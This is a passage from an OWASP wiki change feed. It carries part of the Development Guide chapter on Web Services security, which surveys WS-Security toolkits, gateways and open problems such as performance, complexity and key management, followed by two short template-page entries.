Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for the Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems rather than toolkits or frameworks. On the one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy – checking signatures, tokens, etc. – before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, this time altering the messages to decorate them with the required security elements, signing and/or encrypting them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials extracted from the WSS header from a broader perspective. An example of such a service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however: this performance and simplicity can be achieved only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides the scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they really catch on. Here is a brief look at the problems surrounding the currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which presumably reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing that results from pounding by thousands of developers working in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that, for political reasons, some of these standards are withheld from the public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with the LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task – an accepted reality – and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market face this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As can be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, especially since most of the time the errors that end users see have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define rules for better interoperability among Web Services, using a subset of common security features from various security standards such as WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since the questions of storing, updating, and recovering secret and private keys are more often than not inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Countermeasure&amp;diff=59411</id>
		<title>Template:Countermeasure</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Countermeasure&amp;diff=59411"/>
				<updated>2009-04-24T12:05:37Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;br /&gt;
This is a countermeasure. To view all countermeasures, please see the [[:Category:Countermeasure|Countermeasure Category]] page.&lt;br /&gt;
&lt;br /&gt;
[[Category:Countermeasure]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:SecureSoftware&amp;diff=59410</id>
		<title>Template:SecureSoftware</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:SecureSoftware&amp;diff=59410"/>
				<updated>2009-04-24T12:02:38Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	</feed>